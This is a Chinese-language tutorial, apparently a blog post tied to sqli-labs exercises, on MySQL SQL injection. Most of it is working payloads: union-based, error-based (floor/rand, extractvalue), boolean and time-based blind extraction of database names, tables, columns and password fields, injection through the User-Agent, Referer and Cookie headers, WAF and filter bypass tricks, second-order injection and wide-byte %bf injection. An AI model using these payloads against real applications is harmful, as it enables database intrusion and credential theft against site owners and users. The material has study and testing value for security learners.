本文共 8441 字,大约阅读时间需要 28 分钟。
就是通过把sql命令插入到web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行的sql命令的目的。
通过执行等同于将一个表追加到另一个表的操作来组合两个表的查询
首先我们先来了解一下mysql的系统函数user():当前使用者的用户名database():当前数据库名version():数据库的版本datadir:读取数据库的绝对路径@@vasedir:mysql安装路径@@version_compile_os:操作系统concat():连接一个或者多个字符串group_concat():连接一个组的所有字符串,并以逗号分隔每一条数据
然后再来了解下union
UNION 用于合并两个或多个 SELECT 语句的结果集,并消去表中任何重复行。
UNION 内部的 SELECT 语句必须拥有相同数量的列,列也必须拥有相似的数据类型。同时,每条 SELECT 语句中的列的顺序必须相同.默认地,UNION 操作符选取不同的值。如果允许重复的值,请使用 UNION ALL。当 ALL 随 UNION 一起使用时(即 UNION ALL),不消除重复行。mysql 5.0版本以后提供了information.schema表,表中记录了数据库中所有的库、表、列等信息
理解Schema,schemata,schema_name,table_schema(这是我学习过程中最混淆的地方,可以对照phpmyadmin学习)
SCHEMATA表:储存mysql所有数据库的基本信息,包括数据库名,编码类型路径等,show databases的结果取之此表。(其中包含一列schema_name,即数据库名,不同于schema,schema_name只是单纯的数据库名)
TABLES表:储存mysql中的表信息,(当然也有数据库名这一列,这样才能找到哪个数据库有哪些表)包括这个表是基本表还是系统表,数据库的引擎是什么,表有多少行,创建时间,最后更新时间等。show tables from schemaname的结果取之此表(其中包含table_schema,表中的对应的库名信息,table_name同样不同于tables,只是单纯的表名)
COLUMNS表:提供了表中的列信息,(当然也有数据库名和表名称这两列)详细表述了某张表的所有列以及每个列的信息,包括该列是那个表中的第几列,列的数据类型,列的编码类型,列的权限,注释等。是show columns from schemaname.tablename的结果取之此表(其中包含table_schema,表中对应的库名信息,table_nama表字段对应的表名,columns_name字段对应的字段名)
找到注入点后,我们用order by语句查询当前数据库中的数据表有几个字段
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-PhR6o9SF-1580553141561)(http://class184.cn/wp-content/uploads/2020/01/1-1.png)]
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-wife2xXF-1580553141563)(http://class184.cn/wp-content/uploads/2020/01/2-1.png)] order by 3 返回正常order by 4返回错误
从这里可以看出一共有三个字段,然后用 -1’ union select 1,2,3 %23爆出可以回显敏感信息的位置
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-tVFxRriQ-1580553141564)(http://class184.cn/wp-content/uploads/2020/01/3-1.png)]
下面我们就要查询敏感信息了,就要用到上面所说的系统函数了。
and 1=2 union select 1,version(),database() --可以爆出当前使用的版本和数据库名and 1=2 union select 1,2,schema_name from information_schema.schemata limit 1,1 --爆出数据库名,依次使用limit2,1往下爆库名,and 1=2 union select 1,2,group_concat(schema_name) from information_schema.schemata%23 --也可以使用group_concat函数全部爆出来 我们假设其中有一个库的名字叫flagand 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where schema_name=’flag’ --爆出flag库下的所有的表,假设其中有flagtable表 and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name =’flagtale’ --爆出flagtable下的所有字段,假设有name和password字段 and 1=2 union select 1,2,group_concat(name,password) from flag.flagtable --爆出flag下的flagtable表的name和password的内容
基于错误回显的sql注入就是通过sql语句的矛盾性来使数据被回显到页面上
所用到的函数
count() 统计元祖的个数(相当于求和),如select count(*) from information_schema.tables;rand()用于产生一个0~1的随机数,如select rand();floor()向下取整,如select floor(rand()*2);group by 依据我们想要的规矩对结果进行分组,如select table_name,table_schema from information_schema.tables group by table_name;group_concat将符合条件的同一列中的不同行数据拼接,如select group_concat(0x3a,0x3a,database(),0x3a);0x3a是十六进制的分号又因头太长,为了美观,可以起一个别名,select group_concat(0x3a,0x3a,database(),0x3a)name;
我们先将上面的整合下,
**select count(*),concat(0x3a,0x3a,database(),0x3a,floor(rand()*2))name from information_schema.tables group by name;**先生成随机数,并取证,然后用分号将不同的数据拼接,并取别名name,最后将结果以name进行分组并进行统计,能看到统计出的两个不同的取值,0和1。
再进行多次重复,看一下关于rand()函数与group by 在mysql中的错误报告,我们就是要利用group by part of rand() returns duplicate key error这个bug。
RAND() in a WHERE clause is re-evaluated every time the WHERE is executed.You cannot use a column with RAND() values in an ORDER BY clause, because ORDER BY would evaluate the column multiple times. --这个bug会爆出duplicate key这个错误,然后顺便就把数据也给爆了公式:username=admin' and (select 1 from (select count(*), concat(floor(rand(0)*2),0x23,(你想获取的数据的sql语句))x from information_schema.tables group by x )a) and '1' = '1 and (select 1 from (select count(*),concat(floor(rand()*2),0x23,( select group_concat(schema_name) from information_schema.schemata ) )name from information_schema.tables group by name)a) --爆出所有库名,同上面一样,假设有falg库 and (select 1 from (select count(*),concat(floor(rand()*2),0x23,( select group_concat(table_name) from information_schema.tables where table_schema=’flag’ ) )name from information_schema.tables group by name)a) --爆出flag下的所有表,假设有flagtable表 and (select 1 from (select count(*),concat(floor(rand()*2),0x23,( select group_concat(column_name) from information_schema.columns where talbe_name =’flagtable’ ) )name from information_schema.tables group by name)a) --爆出flagtable表的所有字段,假设有name和password and (select 1 from (select count(*),concat(floor(rand()*2),0x23,( select group_concat(name,password) from flag.flagtable ) )name from information_schema.tables group by name)a) --爆出name和password字段的内容
返回的界面只有两种情况,即TRUE和FALSE,这样说并不是很准确,因为SQL查询无非就这两种情况,应该说是盲注的时候你只能得到一个正常的页面或者是什么页面的不存在,甚至你在查询表的记录过程也不会有显示。
首先了解几个函数
length():返回字符串的长度
substr():截取字符串
ascii():返回字符的ascii码
count():统计元祖的个数(相当于求和)如 :select count(*) from information_schema.tables;
利用方法:
爆数据库的路径and ascii(substr(@@datadir,1,1))>69 --然后使用二分法一步一步确定。爆所有的数据库名
and ascii(substr((select schema_name from information_schema.schemata limit 2,1),1,1))>101 --limit函数爆出的是第二个数据库的第一个字符,同上,假设其中一个库名为flag爆数据库表名
and (ascii(substr((select table_name from information_schema.tables where table_schema=’flag’ limit 0,1),1,1)))>100 --假设其中一个表名为flagtable
爆出数据库的列名
and (ascii(substr((select column_name from information_schema.columns where table_name=’flagtable’ limit 0,1),1,1)))>100 --假设其中列名为name和password爆出列里的数据内容and ascii(substr((select group_concat(name,password) from flag.flagtable limit 0,1),1,1))>48
这样我们就一步一步的爆出数据库的信息了
web页面的返回值只有一种,true,无论输入任何值,它的返回都会按正确的来处理。加入特定的时间函数,通过查看是web页面返回的时间差来判断注入的语句是否正确
sleep()函数
执行将程序(进程)挂起一段时间
if(expr1,ecpr2,expr3)判断语句
爆库名and if(ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1))>100,1,sleep(3)) --使用二分法,一步一步爆出数据库名,假设其中有一数据库名为flag 爆表名and if(ascii(substr((select table_name from information_schema.tables where table_schema=’flag’ limit 1,1) ,1,1))>101,1,sleep(3)) --假设有一表名为flagtable 爆列名and if(ascii(substr((select column_name from information_schema.columns where table_name=’flagtable’ limit 1,1) ,1,1))>100,1,sleep(3)) --假设爆出列名为name和password 爆表中的内容and if(ascii(substr((select group_concat(name,password) from flag.flagtable limit 0,1) ,1,1))>48,1,sleep(3))
用户代理(user agent)是记录软件程序的客户端信息的HTTP头字段,他可以用来统计目标和违规协议。在HTTP头中应该包含它,这个字段的第一个空格前面是软件的产品名称,后面有一个可选的斜杠和版本号。
并不是所有的应用程序都会被获取到user-agent信息,但是有些应用程序利用它存储一些信息(如:购物车)。 HTTP查询实例: GET /index.php HTTP/1.1 Host: [host] User-Agent: aaa’ or 1/* 然后将包发送到Repeater在user-Agent修改为’and extractvalue(1,concat(0x7e,(select @@version),0x7e)) and ‘1’='1
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Yi1OcRJR-1580553141572)(http://class184.cn/wp-content/uploads/2020/01/5.png)]http referer是header的一部分,当浏览器向web服务器发送请求的时候,一般会带上referer,告诉服务器我是从哪个页面链接过来的,服务器以此可以获得一些信息用于处理
以下测试基于sqli-labs第十九关的测试结果
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-BM7lIvSC-1580553141587)(http://class184.cn/wp-content/uploads/2020/01/6.png)]cookie(存储在用户本地终端上的数据)有服务器生成,发给user-agent(一般是浏览器),浏览器会把cookie的key/value保存到某个目录下的文本文件内,下次请求同一网站时就会发送还cookie给服务器(前提是浏览器设置为启用cookie)。cookie名称和值可以有服务器端开发自己定义,对于jsp而言也可以直接写入jessionid,这样服务器可以知道该用户是否合法用户以及是否需要重新登录等,服务器keyhi设置或读取cookie中包含信息,借此维护用户跟服务器会话中的状态。
sql-libs 20: 我们修改 cookie 为 uname=admin1’and extractvalue(1,concat(0x7e,(select @@basedir),0x7e))# [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-YUj8RSLL-1580553141594)(http://class184.cn/wp-content/uploads/2020/01/8.png)] 可以看到报错了,我们得到了 mysql 的路径and ——&&
or —— ||
空格被过滤
可以使用”%09 %0A %0C %0D %0B”替代,也可以用or和and语句来构造到达闭合语句的效果。
union select 过滤
使用大小写绕过,如UNion,SElect
多次重复,如ununionion,selselectect
在union select 联合使用被过滤的情况,union all select
php get 获取参数时有一个特性,当某个参数被多次赋值时会保留最后一次被赋值时的值。如id=1&id=&2&id=3这时,程序会返回id=3的值,但WAF只对第一次的id进行测试,如果传入多个id,那么后面的id则存在注入漏洞
输入id=1&id=&2&id=3‘就会出现报错
注入过程分为两个部分,语句插入和语句执行。常规的注入中都是将sql语句插入后即可显示效果,出错或者得出注入结果,而二次注入的第一步不会产生任何反应,因为它只是一个语句的插入,并没有执行,在第二步运行时才能执行第一步插入的语句并显示结果。而这两个点可能不在同一位置。
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-GpeWq9XW-1580553141597)(http://class184.cn/wp-content/uploads/2020/01/7.png)]此时修改密码,单引号闭合语句,井号注释后面的语句,修改的就不是admin’#的密码了,而是admin的密码。
GB2312 , GBK , GB18030 , BIG5 , SHIFT_JIS 等这些都是常说的宽字节(两个字节),ascii就是单字节(一个字节)
GBK编码,他的范围是0x84100xFEFE(不包括xx7F)ascii编码,他的编码范围是ascii(0)ascii(127),另外有一个扩展ascii打印字符,他的范围是ascii(128)~ascii(255)在每个字符前添加反斜杠:\
my_sql_real_escape_string()
**my_sql_real_escape_string()**函数转义sql语句中使用的字符串中的特殊符:\x00 , \n , \r , \ , ’ , " , 、x1aid=1,我们在后面家单引号,双引号都返回正常,因为被添加反斜杠或转义了,此时我们可以在测试字符前加%bf
id=1%bf’就会报错了
参考文章: https://www.cnblogs.com/JetpropelledSnake/p/9017949.html#top